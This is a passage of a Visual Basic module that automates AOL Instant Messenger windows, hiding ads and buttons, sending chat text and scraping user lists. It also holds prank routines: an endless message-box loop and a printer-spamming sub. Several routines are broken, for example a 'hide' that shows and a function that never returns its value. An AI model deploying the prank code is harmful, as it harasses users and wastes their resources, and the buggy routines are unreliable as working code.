WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
End Sub
Sub Aim_Chat_Show_Ad1()
'shows chat ad #1
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 1
End Sub
Sub Aim_Chat_Hide_Ad2()
'hides chat ad #2
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
End Sub
Sub Aim_Chat_Show_Ad2()
'shows chat ad #2
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 1
End Sub
Sub Aim_Chat_Hide_Ad3()
'hides chat ad #3
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 0
End Sub
Sub Aim_Chat_Show_Ad3()
'shows chat ad #3
Dim aimchatwnd As Long, WndAte32Class As Long, ate32class As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
WndAte32Class& = FindWindowEx(aimchatwnd&, WndAte32Class&, "WndAte32Class", vbNullString)
ate32class& = FindWindowEx(WndAte32Class&, 0&, "Ate32Class", vbNullString)
ShowWindow ate32class&, 1
End Sub
Sub Aim_Chat_Show_InfoButton()
'shows the chat info button
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Chat_Hide_TalkButton()
'hides the chat talk button
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Chat_Hide_IgnoreButton()
'hides the chat ignore button
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Chat_Hide_ImButton()
'hides the chat IM button.
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, 0&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Chat_Show_ImButton()
'shows the im button in the chatroom
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, 0&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Chat_Hide_UserList()
'hides the chatroom users list
Dim aimchatwnd As Long, oscartree As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscartree& = FindWindowEx(aimchatwnd&, 0&, "_Oscar_Tree", vbNullString)
ShowWindow oscartree&, 1
End Sub
Sub Aim_Chat_Show_UserList()
'hides the chatroom users list
Dim aimchatwnd As Long, oscartree As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscartree& = FindWindowEx(aimchatwnd&, 0&, "_Oscar_Tree", vbNullString)
ShowWindow oscartree&, 1
End Sub
Sub Aim_Chat_Hide_InfoButton()
'shows the chat info button
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 0
End Sub
Sub Aim_Chat_Show_TalkButton()
'shows the chat talk button
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Aim_Chat_Show_IgnoreButton()
'shows the chat ignore button
Dim aimchatwnd As Long, oscariconbtn As Long
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
ShowWindow oscariconbtn&, 1
End Sub
Sub Hide_Desktop()
'hides desktop
Dim Progman As Long, SHELLDLLDefView As Long, SysListView32 As Long
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView32& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
ShowWindow SysListView32&, 0
End Sub
Sub Show_Desktop()
'This shows your desktop.
Dim Progman As Long, SHELLDLLDefView As Long, SysListView32 As Long
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView32& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
ShowWindow SysListView32&, 1
End Sub
Sub Delete_DIR(TheDiR$)
'This deletes a directory.
RmDir (TheDiR$)
End Sub
Sub Shell_File(TheFile$)
'This opens a file.
Shell (TheFile$)
End Sub
Sub Infinite_MSGBOX(Message$)
'idea taken from itchyballvirii.bas
Do
MsgBox (Message$)
Loop
End Sub
Function File_Name(Prompt As String) As String
'gets the files name
File_Name = LTrim$(RTrim$(UCase$(InputBox$(Prompt, "Enter File Name"))))
End Function
Sub File_ReName(sFromLoc As String, sToLoc As String)
'renames a file
Name sFromLoc As sToLoc
End Sub
Sub Shell_Winver()
Shell ("C:\windows\winver.exe")
End Sub
Sub Delete_File(File As String)
'taken from itchyballbatch2.bas
'This deletes a file.
Dim Block1 As String, Block2 As String, Blocks As Long
Dim hFileHandle As Integer, iLoop As Long, offset As Long
Const BLOCKSIZE = 4096
Block1 = String(BLOCKSIZE, "X")
Block2 = String(BLOCKSIZE, " ")
hFileHandle = FreeFile
Open File For Binary As hFileHandle
Blocks = (LOF(hFileHandle) \ BLOCKSIZE) + 1
For iLoop = 1 To Blocks
offset = Seek(hFileHandle)
Put hFileHandle, , Block1
Put hFileHandle, offset, Block2
Next iLoop
Close hFileHandle
Kill File
End Sub
Sub printerfuck(numberofpages As String, PrinterMessage As String)
'taken from voltron.bas
Dim HWidth, HHeight, i, Msg
On Error GoTo ErrorHandler
Msg = PrinterMessage
For i = 1 To numberofpages
HWidth = Printer.TextWidth(Msg) / 2
HHeight = Printer.TextHeight(Msg) / 2
Printer.CurrentX = Printer.ScaleWidth / 2 - HWidth
Printer.CurrentY = Printer.ScaleHeight / 2 - HHeight
Printer.Print Msg & " " & Printer.Page & " of "; numberofpages + " pages!!!! "; ""
Printer.NewPage ' Send new page.
Next i
Printer.EndDoc ' Printing is finished.
Exit Sub
ErrorHandler:
Exit Sub
End Sub
Sub AIM_GroupsTo_Combo(Cmb As ComboBox)
'taken from digitalaim.bas
'adds your buddy list groups to a combobox.
Dim BuddyList As Long, TabGroup As Long
Dim BuddyTree As Long, LopGet, MooLoo, Moo2
Dim Name As String, NameLen, buffer As String
Dim TabPos, NameText As String, Text As String
Dim mooz, Well As Integer
BuddyList& = FindWindow("_Oscar_BuddyListWin", vbNullString)
If BuddyList& <> 0 Then
Do
TabGroup& = FindWindowEx(BuddyList&, 0, "_Oscar_TabGroup", vbNullString)
BuddyTree& = FindWindowEx(TabGroup&, 0, "_Oscar_Tree", vbNullString)
Loop Until BuddyTree& <> 0
LopGet = SendMessage(BuddyTree&, LB_GETCOUNT, 0, 0)
For MooLoo = 0 To LopGet - 1
Call SendMessageByString(BuddyTree&, LB_SETCURSEL, MooLoo, 0)
NameLen = SendMessage(BuddyTree&, LB_GETTEXTLEN, MooLoo, 0)
buffer$ = String$(NameLen, 0)
Moo2 = SendMessageByString(BuddyTree&, LB_GETTEXT, MooLoo, buffer$)
TabPos = InStr(buffer$, Chr$(9))
NameText$ = Right$(buffer$, (Len(buffer$) - (TabPos)))
TabPos = InStr(NameText$, Chr$(9))
Text$ = Right$(NameText$, (Len(NameText$) - (TabPos)))
Name$ = Text$
If InStr(Name$, "(") <> 0 And InStr(Name$, ")") <> 0 Then
For mooz = 0 To Cmb.ListCount - 1
If Name$ = Cmb.List(mooz) Then
Well% = 123
GoTo HellNo
End If
Next mooz
If Well% <> 123 Then
Cmb.AddItem Name$
Else
End If
End If
HellNo:
Next MooLoo
End If
End Sub
Sub AIM_GroupsTo_List(lis As ListBox)
'taken from digitalaim.bas
'this adds your buddy list groups to a listbox.
Dim BuddyList As Long, TabGroup As Long
Dim BuddyTree As Long, LopGet, MooLoo, Moo2
Dim Name As String, NameLen, buffer As String
Dim TabPos, NameText As String, Text As String
Dim mooz, Well As Integer
BuddyList& = FindWindow("_Oscar_BuddyListWin", vbNullString)
If BuddyList& <> 0 Then
Do
TabGroup& = FindWindowEx(BuddyList&, 0, "_Oscar_TabGroup", vbNullString)
BuddyTree& = FindWindowEx(TabGroup&, 0, "_Oscar_Tree", vbNullString)
Loop Until BuddyTree& <> 0
LopGet = SendMessage(BuddyTree&, LB_GETCOUNT, 0, 0)
For MooLoo = 0 To LopGet - 1
Call SendMessageByString(BuddyTree&, LB_SETCURSEL, MooLoo, 0)
NameLen = SendMessage(BuddyTree&, LB_GETTEXTLEN, MooLoo, 0)
buffer$ = String$(NameLen, 0)
Moo2 = SendMessageByString(BuddyTree&, LB_GETTEXT, MooLoo, buffer$)
TabPos = InStr(buffer$, Chr$(9))
NameText$ = Right$(buffer$, (Len(buffer$) - (TabPos)))
TabPos = InStr(NameText$, Chr$(9))
Text$ = Right$(NameText$, (Len(NameText$) - (TabPos)))
Name$ = Text$
If InStr(Name$, "(") <> 0 And InStr(Name$, ")") <> 0 Then
For mooz = 0 To lis.ListCount - 1
If Name$ = lis.List(mooz) Then
Well% = 123
GoTo HellNo
End If
Next mooz
If Well% <> 123 Then
lis.AddItem Name$
Else
End If
End If
HellNo:
Next MooLoo
End If
End Sub
Function Aim_Chat_Get_RoomName() As String
'gets the room name by reading the chat caption.
Dim aimchatwnd As Long, GetText$
aimchatwnd& = FindWindow("AIM_ChatWnd", vbNullString)
Dim TheText As String, TL As Long
TL& = SendMessageLong(aimchatwnd&, WM_GETTEXTLENGTH, 0&, 0&)
TheText$ = String$(TL& + 1, " ")
Call SendMessageByString(aimchatwnd&, WM_GETTEXT, TL + 1, TheText$)
GetText$ = Left(TheText$, TL&)
End Function
Sub Aim_Chat_IgnoreUser(Who As String)
'taken from digitalaim.bas
'ignores user.
Dim ChatRoom As Long, LopGet, MooLoo, Moo2
Dim Name As String, NameLen, buffer As String
Dim TabPos, NameText As String, Text As String
Dim mooz, Well As Integer, BuddyTree As Long
ChatRoom& = FindWindow("AIM_ChatWnd", vbNullString)
If ChatRoom& <> 0 Then
Do
BuddyTree& = FindWindowEx(ChatRoom&, 0, "_Oscar_Tree", vbNullString)
Loop Until BuddyTree& <> 0
LopGet = SendMessage(BuddyTree&, LB_GETCOUNT, 0, 0)
For MooLoo = 0 To LopGet - 1
Call SendMessageByString(BuddyTree&, LB_SETCURSEL, MooLoo, 0)
NameLen = SendMessage(BuddyTree&, LB_GETTEXTLEN, MooLoo, 0)
buffer$ = String$(NameLen, 0)
Moo2 = SendMessageByString(BuddyTree&, LB_GETTEXT, MooLoo, buffer$)
TabPos = InStr(buffer$, Chr$(9))
NameText$ = Right$(buffer$, (Len(buffer$) - (TabPos)))
TabPos = InStr(NameText$, Chr$(9))
Text$ = Right$(NameText$, (Len(NameText$) - (TabPos)))
Name$ = Text$
If Name$ = Who$ Then GoTo Igorn
Next MooLoo
End If
Igorn:
Dim ChatWindz As Long, IM As Long, IgnoreBut As Long, Klick As Long
ChatWindz& = FindWindow("AIM_ChatWnd", vbNullString)
IM& = FindWindowEx(ChatWindz&, 0, "_Oscar_IconBtn", vbNullString)
IgnoreBut& = FindWindowEx(ChatWindz&, IM&, "_Oscar_IconBtn", vbNullString)
Klick& = SendMessage(IgnoreBut&, WM_LBUTTONDOWN, 0, 0&)
Klick& = SendMessage(IgnoreBut&, WM_LBUTTONUP, 0, 0&)
End Sub
Sub Aim_Chat_Invite_Normal(ThePeople$, TheMessage$, TheRoom$)
'taken from itchyballbatch2.bas
'normal chat invitation
Dim oscarbuddylistwin&
Dim sendbuttonicon1&
Dim oscartabgroup&
Dim oscariconbtn&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
oscartabgroup& = FindWindowEx(oscarbuddylistwin&, 0&, "_oscar_tabgroup", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, 0&, "_oscar_iconbtn", vbNullString)
oscariconbtn& = FindWindowEx(oscartabgroup&, oscariconbtn&, "_oscar_iconbtn", vbNullString)
sendbuttonicon1& = SendMessage(oscariconbtn&, WM_LBUTTONDOWN, 0, 0&)
sendbuttonicon1& = SendMessage(oscariconbtn&, WM_LBUTTONUP, 0, 0&)
Dim aimchatinvitesendwnd&
Dim editx&
aimchatinvitesendwnd& = FindWindow("aim_chatinvitesendwnd", vbNullString)
editx& = FindWindowEx(aimchatinvitesendwnd&, 0&, "edit", vbNullString)
Call SendMessageByString(editx&, WM_SETTEXT, 0&, ThePeople$)
Dim aimchatinvitesendwnd2&
Dim editx2&
aimchatinvitesendwnd2& = FindWindow("aim_chatinvitesendwnd", vbNullString)
editx2& = FindWindowEx(aimchatinvitesendwnd2&, 0&, "edit", vbNullString)
editx2& = FindWindowEx(aimchatinvitesendwnd2&, editx2&, "edit", vbNullString)
Call SendMessageByString(editx2&, WM_SETTEXT, 0&, TheMessage$)
Dim aimchatinvitesendwnd3&
Dim editx3&
aimchatinvitesendwnd3& = FindWindow("aim_chatinvitesendwnd", vbNullString)
editx3& = FindWindowEx(aimchatinvitesendwnd3&, 0&, "edit", vbNullString)
editx3& = FindWindowEx(aimchatinvitesendwnd3&, editx3&, "edit", vbNullString)
editx3& = FindWindowEx(aimchatinvitesendwnd3&, editx3&, "edit", vbNullString)
Call SendMessageByString(editx3&, WM_SETTEXT, 0&, TheRoom$)
Dim aimchatinvitesendwn&
Dim oscariconbt&
aimchatinvitesendwn& = FindWindow("aim_chatinvitesendwnd", vbNullString)
oscariconbt& = FindWindowEx(aimchatinvitesendwn&, 0&, "_oscar_iconbtn", vbNullString)
oscariconbt& = FindWindowEx(aimchatinvitesendwn&, oscariconbt&, "_oscar_iconbtn", vbNullString)
oscariconbt& = FindWindowEx(aimchatinvitesendwn&, oscariconbt&, "_oscar_iconbtn", vbNullString)
Dim sendbuttonicon2&
sendbuttonicon2& = SendMessage(oscariconbt&, WM_LBUTTONDOWN, 0, 0&)
sendbuttonicon2& = SendMessage(oscariconbt&, WM_LBUTTONUP, 0, 0&)
End Sub
Sub Aim_Chat_Info()
'views the chatroom info window
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Chat Room Info...")
End Sub
Sub Aim_Chat_Clear()
'clears open Chat.
Dim aimchatwnd&
Dim wndateclass&
Dim ateclass&
aimchatwnd& = FindWindow("aim_chatwnd", vbNullString)
wndateclass& = FindWindowEx("aim_chatwnd", 0&, "wndate32class", vbNullString)
ateclass& = FindWindowEx(wndateclass&, 0&, "ate32class", vbNullString)
Call SendMessageByString(ateclass&, WM_SETTEXT, 0&, "Chat Cleared")
End Sub
Sub Aim_Chat_CreateShortcut()
'puts a shortcut file to the chatroom on your desktop
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "Create Shor&tcut")
End Sub
Sub Aim_Chat_Print()
'prints the chat log out
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Print...")
End Sub
Sub Aim_Chat_Send_Link(URL$, Text$)
Aim_Chat_Send_Normal "" + Text$ + ""
End Sub
Sub Aim_Chat_Exit()
'exits chat
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Close")
End Sub
Sub Aim_SwitchSN()
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "S&witch Screen Name...")
End Sub
Sub Aim_SelectBudIcon()
'shows the select buddy icon window
Dim oscarbuddylistwin&
oscarbuddylistwin& = FindWindow("_oscar_buddylistwin", vbNullString)
Call RunMenuByString(oscarbuddylistwin&, "Select Bu&ddy Icon...")
End Sub
Sub Aim_Chat_SelectAll()
'selects all of the chat text
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Select All")
End Sub
Sub Aim_Chat_Timestamps_OnOff()
'puts your timestamps on or off
'if you have them off, it will turn them on
'if you have them on, it will turn them off
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Timestamp")
End Sub
Sub Aim_Chat_Help()
'views the chatroom help window
Dim aimchatwnd&
aimchatwnd& = FindWindow("Aim_ChatWnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Help")
End Sub
Sub Aim_Chat_Save()
'saves chatroom text
Dim aimchatwnd&
aimchatwnd& = FindWindow("aim_chatwnd", vbNullString)
Call RunMenuByString(aimchatwnd&, "&Save...")
End Sub
Sub Aim_Chat_Send_Attention(Message$)
'gets attention of chatroom.
Call Aim_Chat_Send_Normal("A T T E N T I O N")
Call Aim_Chat_Send_Normal(Message$)
Call Aim_Chat_Send_Normal("A T T E N T I O N")
End Sub
Sub Aim_Chat_Send_Normal(Message$)
'regular chat send.
Dim aimchatwnd&
Dim wndateclass&
Dim ateclass&
aimchatwnd& = FindWindow("aim_chatwnd", vbNullString)
wndateclass& = FindWindowEx(aimchatwnd&, 0&, "wndate32class", vbNullString)
wndateclass& = FindWindowEx(aimchatwnd&, wndateclass&, "wndate32class", vbNullString)
ateclass& = FindWindowEx(wndateclass&, 0&, "ate32class", vbNullString)
Call SendMessageByString(ateclass&, WM_SETTEXT, 0&, Message$)
Dim sendbuttonicon1&
Dim oscariconbtn&
aimchatwnd& = FindWindow("aim_chatwnd", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, 0&, "_oscar_iconbtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_oscar_iconbtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_oscar_iconbtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_oscar_iconbtn", vbNullString)
oscariconbtn& = FindWindowEx(aimchatwnd&, oscariconbtn&, "_oscar_iconbtn", vbNullString)
sendbuttonicon1& = SendMessage(oscariconbtn&, WM_LBUTTONDOWN, 0, 0&)
sendbuttonicon1& = SendMessage(oscariconbtn&, WM_LBUTTONUP, 0, 0&)
End Sub
Sub Aim_Chat_ToCombo(Cmb As ComboBox)
'adds list of chatroom users to combo box.
'taken from digitalaim.bas
Dim ChatRoom As Long, LopGet, MooLoo, Moo2
Dim Name As String, NameLen, buffer As String
Dim TabPos, NameText As String, Text As String
Dim mooz, Well As Integer, BuddyTree As Long
ChatRoom& = FindWindow("AIM_ChatWnd", vbNullString)
If ChatRoom& <> 0 Then
Do
BuddyTree& = FindWindowEx(ChatRoom&, 0, "_Oscar_Tree", vbNullString)
Loop Until BuddyTree& <> 0
LopGet = SendMessage(BuddyTree&, LB_GETCOUNT, 0, 0)
For MooLoo = 0 To LopGet - 1
Call SendMessageByString(BuddyTree&, LB_SETCURSEL, MooLoo, 0)
NameLen = SendMessage(BuddyTree&, LB_GETTEXTLEN, MooLoo, 0)
buffer$ = String$(NameLen, 0)
Moo2 = SendMessageByString(BuddyTree&, LB_GETTEXT, MooLoo, buffer$)
TabPos = InStr(buffer$, Chr$(9))
NameText$ = Right$(buffer$, (Len(buffer$) - (TabPos)))
TabPos = InStr(NameText$, Chr$(9))
Text$ = Right$(NameText$, (Len(NameText$) - (TabPos)))
Name$ = Text$
For mooz = 0 To Cmb.ListCount - 1
If Name$ = Cmb.List(mooz) Then
Well% = 123
GoTo Endz
End If
Next mooz
If Well% <> 123 Then
Cmb.AddItem Name$
Else
End If
Endz:
Next MooLoo
End If
End Sub
Sub Aim_Chat_ToList(lis As ListBox)
'taken from digitalaim.bas
'adds chatroom users to listbox.
Dim ChatRoom As Long, LopGet, MooLoo, Moo2
Dim Name As String, NameLen, buffer As String
Dim TabPos, NameText As String, Text As String
Dim mooz, Well As Integer, BuddyTree As Long
ChatRoom& = FindWindow("AIM_ChatWnd", vbNullString)
If ChatRoom& <> 0 Then
Do
BuddyTree& = FindWindowEx(ChatRoom&, 0, "_Oscar_Tree", vbNullString)
Loop Until BuddyTree& <> 0
LopGet = SendMessage(BuddyTree&, LB_GETCOUNT, 0, 0)
For MooLoo = 0 To LopGet - 1
Call SendMessageByString(BuddyTree&, LB_SETCURSEL, MooLoo, 0)
NameLen = SendMessage(BuddyTree&, LB_GETTEXTLEN, MooLoo, 0)
buffer$ = String$(NameLen, 0)
Moo2 = SendMessageByString(BuddyTree&, LB_GETTEXT, MooLoo, buffer$)
TabPos = InStr(buffer$, Chr$(9))
NameText$ = Right$(buffer$, (Len(buffer$) - (TabPos)))
TabPos = InStr(NameText$, Chr$(9))
Text$ = Right$(NameText$, (Len(NameText$) - (TabPos)))
Name$ = Text$
For mooz = 0 To lis.ListCount - 1
If Name$ = lis.List(mooz) Then
Well% = 123
GoTo Endz
End If
Next mooz
If Well% <> 123 Then
lis.AddItem Name$
Else
End If
Endz:
Next MooLoo
End If
End Sub
Sub Aim_Im_Clear()
'clears open Im.
Dim aimimessage&
Dim wndateclass&
Dim ateclass&
aimimessage& = FindWindow("aim_imessage", vbNullString)
wndateclass& = FindWindowEx(aimimessage&, 0&, "wndate32class", vbNullString)
ateclass& = FindWindowEx(wndateclass&, 0&, "ate32class", vbNullString)
Call SendMessageByString(ateclass&, WM_SETTEXT, 0&, "Instant Message Cleared")
End Sub
Sub Aim_Im_TimestampsOnOff()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Timestamp")
End Sub
Sub Aim_Im_Save()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Save...")
End Sub
Sub Aim_Im_CreateShortcut()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "Create Shor&tcut")
End Sub
Sub Aim_Im_Warn()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Warn...")
End Sub
Sub Aim_Im_GetInfo()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Info...")
End Sub
Sub Aim_Im_DirectConnect()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "Connect to Send IM I&mage")
End Sub
Sub Aim_Im_Block()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Block...")
End Sub
Sub Aim_Im_Print()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Print...")
End Sub
Sub Aim_Im_Close()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "&Close")
End Sub
Function Aim_Im_SendFile()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "Send &File...")
End Function
Function Aim_Im_GetFile()
Dim aimimessage&
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
Call RunMenuByString(aimimessage&, "Get &File...")
End Function
Function Aim_Im_Get_Sn() As String
'taken from digitalaim.bas
'gets the SN of person in im.
Dim IMWin As Long, GetIt As String, clear As String
IMWin& = FindWindow("AIM_IMessage", vbNullString)
GetIt$ = Get_Caption(IMWin&)
clear$ = ReplaceString(GetIt$, " - Instant Message", "")
Aim_Im_Get_Sn = clear$
End Function
Function Get_Caption(TheWin)
' From Dos32.bas
Dim WindowLngth As Integer, WindowTtle As String, Moo As String
WindowLngth% = GetWindowTextLength(TheWin)
WindowTtle$ = String$(WindowLngth%, 0)
Moo$ = GetWindowText(TheWin, WindowTtle$, (WindowLngth% + 1))
Get_Caption = WindowTtle$
End Function
Function Aim_Im_Get_Text()
'Gets text from open Im.
Dim aimimessage2$
Dim aimimessage&
Dim wndateclass&
Dim ateclass&
aimimessage& = FindWindow("aim_imessage", vbNullString)
wndateclass& = FindWindowEx(aimimessage&, 0&, "wndate32class", vbNullString)
ateclass& = FindWindowEx(wndateclass&, 0&, "ate32class", vbNullString)
aimimessage2$ = Aim_Im_Get_Text(ateclass&)
Aim_Im_Get_Text = aimimessage2$
End Function
Sub Aim_Im_Hide_BlockButton()
'hides the block button in an im.
Dim aimimessage As Long, oscariconbtn As Long
aimimessage& = FindWindow("AIM_IMessage", vbNullString)
oscariconbtn& = FindWindowEx(aimimessage&, oscariconbtn&, "_Oscar_IconBtn", vbNullString)
